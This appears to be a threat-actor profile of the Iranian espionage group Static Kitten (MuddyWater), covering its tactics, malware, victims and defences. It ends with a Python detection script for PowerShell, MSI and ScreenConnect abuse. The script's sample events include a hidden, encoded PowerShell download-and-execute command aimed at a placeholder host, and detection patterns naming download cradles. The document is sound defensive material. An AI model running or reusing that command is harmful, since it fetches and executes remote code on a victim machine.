Static Kitten
Static Kitten, also known as MuddyWater, Seedworm, TEMP.Zagros, and Mercury, is a sophisticated Iranian state-sponsored cyberespionage group that has operated since at least 2017. Strongly linked to Iran's Ministry of Intelligence and Security (MOIS), this group employs a variety of advanced tactics and techniques, including spear-phishing campaigns, PowerShell-based backdoors, and Android spyware, to target governments, academia, telecommunications, and NGOs primarily in the Middle East and Central Asia.
Static Kitten TTPs
Tactics
Static Kitten’s primary motivation is to conduct espionage, focusing on intelligence gathering for geopolitical and economic advantages. This includes stealing sensitive data and intellectual property from strategic entities.
Techniques
To achieve its espionage objectives, Static Kitten frequently employs social engineering techniques, such as spear-phishing emails carrying malicious documents or links. The group also abuses legitimate tools, including file-sharing platforms and remote management software, to carry out its operations while blending in with normal activity.
Procedures
Static Kitten leverages POWERSTATS and NTSTATS PowerShell backdoors, Android spyware (e.g., DCHSpy), and custom malware like BugSleep and MuddyRot. Additionally, it uses legitimate tools like ScreenConnect and MSI installers in its campaigns to mask malicious activities and evade detection.
Indicators of Compromise (IoCs)
Static Kitten’s operations leave behind several IoCs, including malicious domains, spear-phishing email headers, PowerShell malware hashes, and indicators related to Android spyware such as app permissions and sideloaded packages.
Key Victims
Static Kitten primarily targets government agencies, foreign affairs ministries, academic institutions, and telecommunications providers within the Middle East. Other prominent victims include NGOs, media outlets, and expatriate communities.
Notable Cyberattacks
One significant campaign in 2021 targeted government agencies in Kuwait and the UAE using Israeli-themed lures tied to ministries of foreign affairs. More recently, in 2024, Static Kitten expanded its operations with the development of a new attack framework, DarkBeatC2, and the deployment of BugSleep and MuddyRot implants to target Israel and other strategic regions.
Law Enforcement & Arrests
To date, there have been no confirmed arrests or law enforcement actions targeting Static Kitten, reflecting the challenges of addressing state-sponsored cyber threats at an international level.
How to Defend Against Static Kitten
Implement strong email security, including filtering phishing attempts and blocking malicious attachments.
Monitor for unusual use of remote management tools and PowerShell scripts.
Bolster mobile security by restricting apps from untrusted sources.
Patch known vulnerabilities promptly to limit exposure.
Leverage Huntress tools to detect persistence mechanisms and uncover malicious activities.
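The monitoring advice above, shown as an added example that is not Huntress's tooling and not code from this profile: a small Python triage routine that runs over constructed process-creation records (fields modelled on Sysmon Event ID 1) and flags the behaviours this profile associates with Static Kitten, namely PowerShell launched from an Office application, encoded PowerShell carrying a download cradle, and MSI installers or a ScreenConnect client executing from user-profile paths rather than Program Files. The sample events, the paths, the approved-location rule and the encoded payload are all constructed for the example.

```python
"""Triage process-creation records for PowerShell and remote-management abuse.

Added example. Event fields mirror Sysmon Event ID 1 (Image, ParentImage,
CommandLine); all sample data below is constructed, not observed telemetry.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Parents from which PowerShell or msiexec should not normally be launched.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# ScreenConnect client binaries; the approved install roots are an assumption
# about this environment, not a vendor-documented rule.
RMM_BINARIES = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
APPROVED_RMM_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")

# -EncodedCommand and its short forms, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Common PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer|\biwr\b",
    re.I,
)
USER_PROFILE_PATH = re.compile(r"[a-z]:\\users\\", re.I)


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> str | None:
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, if present."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: ProcessEvent) -> list[str]:
    """Return the list of suspicious traits found in one process-creation event."""
    findings: list[str] = []
    image, parent = basename(event.image), basename(event.parent_image)
    cmd = event.command_line
    if image in {"powershell.exe", "pwsh.exe"}:
        if parent in OFFICE_PARENTS:
            findings.append("powershell spawned by office application")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded powershell command")
            cmd = f"{cmd} {decoded}"  # inspect the decoded script too
        if DOWNLOAD_CRADLE.search(cmd):
            findings.append("powershell download cradle")
    elif image == "msiexec.exe":
        if parent in OFFICE_PARENTS:
            findings.append("msi installer launched by office application")
        if USER_PROFILE_PATH.search(cmd):
            findings.append("msi installer run from user profile path")
    elif image in RMM_BINARIES and not event.image.lower().startswith(APPROVED_RMM_ROOTS):
        findings.append("remote management tool running outside Program Files")
    return findings


def triage(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    """Return only the events that produced at least one finding."""
    hits = []
    for event in events:
        findings = assess(event)
        if findings:
            hits.append((event, findings))
    return hits


# Constructed encoded payload: a download cradle pointing at a reserved test domain.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16-le")
).decode()

# Constructed sample events: one malicious PowerShell launch, one benign scheduled
# script, one Office-spawned MSI install, one ScreenConnect client from %TEMP%.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 f"powershell.exe -nop -w hidden -enc {_ENCODED}"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\svchost.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\update.msi /qn"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\ScreenConnect.ClientService.exe",
                 r"C:\Windows\System32\msiexec.exe",
                 r"C:\Users\alice\AppData\Local\Temp\ScreenConnect.ClientService.exe"),
]

if __name__ == "__main__":
    for event, findings in triage(SAMPLE_EVENTS):
        print(basename(event.image), "<-", basename(event.parent_image), ":", ", ".join(findings))
```

The benign scheduled-task launch produces no findings, which is the point of keying on parent process, encoding and location rather than on PowerShell or msiexec alone; in a real deployment the parent set and the approved install roots would be tuned to the environment, and the decoded script would be retained as evidence rather than only pattern-matched.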